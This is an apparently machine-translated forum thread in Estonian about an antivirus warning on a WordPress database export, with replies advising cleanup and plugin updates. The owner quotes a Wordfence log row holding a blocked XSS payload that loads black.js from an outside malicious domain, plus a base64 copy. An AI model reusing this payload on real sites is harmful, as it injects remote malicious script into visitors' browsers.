Kuidas WordPressi saiti varundada

See juhtub minuga esimest korda. Lisan ohu kohta saadud sõnumi ekraanipildi. Siin on ka link, mida ESET-tarkvara mulle selle kohta lisateabe saamiseks näitab.

Käivitasin veebisaidil pahavara skannimise, kuid võib-olla ei suuda need kontrollida kokkupandavat + eksporditavat .sql-faili, ainult saidi teisi faile (?).

Kui Google Chrome proovis pääseda veebisaidile ..XY ", leiti oht (HTML / ScrInject.B)."

Uuendus:

Tänu allolevale vestlusele @closetnociga leidsin otsides andmebaasist üsna kahtlase rea <script>, <script/script> jne, ja kontrollides väheseid tulemusi, mis sain. Siit leidsin seni (liinil 477799):

(4090, 1570436010.678350, 1570436010.590000, 0x00000000000000000000ffffb280c19e, 0, 403, 0, 0, 0, 'https://my-domain-name-which-i-censored-it-for-now.com/', '\'><script type=text/javascript src=\'https://js.balantfromsun.com/black.js?&tp=3\'></script>', '\'><script type=text/javascript src=\'https://js.balantfromsun.com/black.js?&tp=3\'></script>', 'blocked:waf', 'Generic XSS Injection in IP Forwarding Headers', '{\'learningMode\':0,\'failedRules\':\'59\',\'paramKey\':\'cmVxdWVzdC5oZWFkZXJzW1gtRm9yd2FyZGVkLUZvcl0=\',\'paramValue\':\'Ij48c2NyaXB0IHR5cGU9dGV4dC9qYXZhc2NyaXB0IHNyYz0naHR0cHM6Ly9qcy5iYWxhbnRmcm9tc3VuLmNvbS9ibGFjay5qcz8mdHA9Myc+PC9zY3JpcHQ+\',\'path\':\'Lw==\',\'category\':\'xss\',\'ssl\':1}'),

Domeen „balantfromsun.com” näitab minu brauserit pahatahtlikult. Ma arvan, et püüdsime sealt juba mõne pahavara. Nüüd proovin leida faili, mis selle koodi DB-sse sisestab.

Viimane värskendus:

Ilmselt paigutas Wordfence'i pistikprogramm ise probleemse skripti DB-i (minu küsimus: MIKS?), Tabelisse wp_wfhits. Kustutasin selle konkreetse rea (näidatud ülal) ja viirusetõrjet enam ei käivitata.

  • Ma ei saa aru, mida peate silmas SQL-faili "ei saa alla laadida" all. Näib, et teie töölaual on viirusetõrjetarkvaral probleeme veebipõhise FTP-rakendusega. Tõenäoliselt soovite oma saidifailidega manipuleerimiseks kasutada mitte-brauseri FTP-klienti.
  • Tere, @GregNickoloff, jah, ma muudan selle küsimuse pealkirja nüüd, sest kindlasti on peamine mure see, et minu veebisait (ja DB) tõenäoliselt nakatus. Vähemalt veel tõlgendan seda, et viirusetõrjetarkvara tabas tõelise pahavara tegevuse selle põhjal, mida leidsin .sql-failist. (ülaltoodud süstitud skript halli tausta ja valge tekstiga. Muide, milline on teie arvamus selle kohta?). FYI viirusetõrjesüsteem hoiatab mind isegi siis, kui avan nakatunud .sql oma arvuti redaktoris. Nii et tundub, et see töötab minu jaoks kiiresti. Nii et ma eeldan, et see hoiatab mind ükskõik millisest kanalist, kuhu faili haaran (?)
  • 1 Vaadake vormindamisabi, kuidas oma küsimusele koodi muuta. Põhimõtteliselt saate taandada kõik 4 tühikut. Redaktoril on nupp, mis aitab teil seda teha. Ikoon näeb välja nagu {}
  • 1 Ärge postitage pilte koodidest, vigadest ega väljundist!
  • @StephenOstermiller, skriptimärgendid eemaldatakse endiselt täielikult. Kas sellepärast, et koodiplokkidest pääseb? Palun aidake mind välja, kuidas kuvada siis ülaltoodud pildil olev koodilõik, ilma et SE parser muutuks? Pange see tagasiside vahele sisekoodina ?? (Olen redigeerimisjuhendit uuesti lugenud, kuid ei saanud sellele õiget vastust) Tervist!

Te ei ütle, milleks .sql-fail on mõeldud, aga .sql-fail iseenesest on lihtsalt tavaline tekst ja seega mitte oht. Eirake seda teadet.

Pole haruldane, et viirusetõrjetarkvara tabab erinevaid faile. Nad otsivad mustreid. Tuntud JavaScripti failid pingitakse sageli viirustena.

See tähendab, et kui te ei tea, mis see fail on, või kui fail on teie andmebaasi varukoopia, peate oma andmebaasi käsitsi uurima, et veenduda, et SQL-i süstimise haavatavuse tagajärjel pole JavaScripti koodi. Teie andmebaasi tundmata ei saa me teid siin aidata, välja arvatud juhul, kui see on CMS (sisuhaldussüsteem), näiteks WordPress. Üks teistest korstnatest võib muidu aidata.

Lõpuks veenduge, et kogu teie tarkvara oleks ajakohane. Vastasel juhul võib SQL-i rünnaku korral see uuesti juhtuda.

  • näib, et hoiatus võib tulla saidilt endalt, enne kui SQL alla laaditakse.
  • @closetnoc on antud juhul tegemist Wordpress DB ekspordifailiga (kirjutasin WP pealkirjaks, kuid nüüd muudan selle selguse huvides Wordpressiks. Tänan teid vihjete eest, need on kasulikud laiematel olukordadel.
  • @Steve jah, ma arvan sama. Kui fail kokku pannakse ja server üritab seda brauserisse lükata, juhtub päringus / päises / koodis (?) Midagi.
  • @ ViktorBorítás Kui tegelete oma WP DB eksportimisega, siis tundub mulle, et teie WP sait on näinud edukat SQLi süstimist või muud rünnakut.
  • @closetnoc im kindel, et see on võimalik. Siis on minu küsimus: milliseid meetmeid / taktika te võtaksite. Nagu ma näen selle konkreetse maiuspala statistikast ja ajaloost, pole see praegu tipptasemega kunagi varem olnud nii aktiivne kui tänapäeval.

Pole haruldane, et pahatahtlik JS süstitakse ja salvestatakse andmebaasi. Kui see on teie saidi andmebaasi varukoopia, võib see sisaldada elemente, mis on tuvastatud pahatahtlikena. Tundub, et see on juhtum selle põhjal, mida olete leidnud SQL-failist.

Ma leiaksin veel ühe maineka skanneri, mis töötab serveris ja vaataks, mida see leiab, ja kustutaksin siis kahtlased skriptid andmebaasist. Teie hostiteenuse pakkuja suudab korraliku teenuse installida või soovitada. Saadaval on ka muud teenused.

Sellisel juhul on oluline eristada viirusetõrjetarkvara töötamist töölaual / brauseris ja veebiserveris töötamist. Kuigi töölaua / brauseri viirusetõrje aitab teid probleemist teavitada, ei saa see probleemi lahendamiseks midagi teha. Seda tuleb teha serveris.

Pahatahtlike skriptide puhastamine tähendaks nende eemaldamist reaalsest SQL-i andmebaasist ja mitte ainult SQL-failist. Staatiline fail on otse andmebaasi varukoopia ja sisuliselt inertne. Pahatahtlik skript tuleb tegelikust andmebaasist eemaldada, et puhastamine midagi head annaks.

Veenduge, et kõik lisandmoodulid, laiendused jms oleksid ajakohased. Süstitud skripti puhastamine on üsna lihtne, kuid esmatähtis on nende tagasituleku takistamine. Muidu on nad selleks ajaks homme tagasi. Tõenäoliselt süstitakse pahatahtlik skript lehtede / elementide sisusse olemasoleva mooduli ärakasutamist, mitte natuke halba koodi, seega on vajadus kõige ajakohasemate laienduste / lisandmoodulite / moodulite järele suurem oluline.

  • Teie selgitus tundub täiesti õige. Skannisin juba veebisaiti 2-3 kõige populaarsema antivara wp pistikprogrammi abil (samast 'liigast'), ilma et oleksin praeguseks mingit kasulikku hoiatust leidnud. Kuid üks, mida te ülal soovitasite, ei olnud nende hulgas. Nüüd proovin ka sellega skannida. Samuti eeldas DID, et mõni skanner suudab tuvastada probleemse osa (d), mis sisaldab koodi või elementi, mis süstib. Kuid neid ei õnnestunud avastada. Nii et "Süstitud skriptide puhastamine on üsna lihtne" on endiselt pooleli ja vastavalt tulemustele on see veel üsna keeruline. ;)
  • Kui pahad kasutasid ühte teie pistikprogrammi pahade skriptide sisestamiseks saidi andmebaasi, ei pruugi serveris olevate saidifailide skannimine probleeme ilmneda, kuna halb kraam on andmebaasi salvestatud. Üldiselt on viis selle leidmiseks teha uus andmebaas teksti / SQL-faili ja skannida see. (Suuresti see, mida olete juba teinud.) Suurim probleem on takistada uuesti nakatamist. Sellest vabanemiseks võib kuluda mitu ringi.
  • leidsin, et probleemne skript paigutati DBf-i Wordfence'i pistikprogrammi abil. Olen mõnevõrra üllatunud. Võib-olla oli see sisse häkitud? .. või miks nad paneksid pahatahtliku skripti püüdmise, näited, mis on DB-sse pandud nii? Uuendasin oma küsimust. Ikka üritatakse leida selle nähtuse põhjust. Terviseks
  • See on päris kummaline. Ma ei eeldaks, et see probleem on. Ma võtaksin ühendust Wordfence'i tüüpidega ... kui mitte midagi muud, veendumaks, et see ei korduks või juhtuks kedagi teist.
  • Aitäh Greg, kirjutasin neile ka e-kirja ja saatsin pileti nende tasuta foorumisse (ma pole veel tasuline liige). Postitame siia / värskendame algset küsimust, kui selle kohta on kasulikku teavet.

none: Charles Robertson | none

none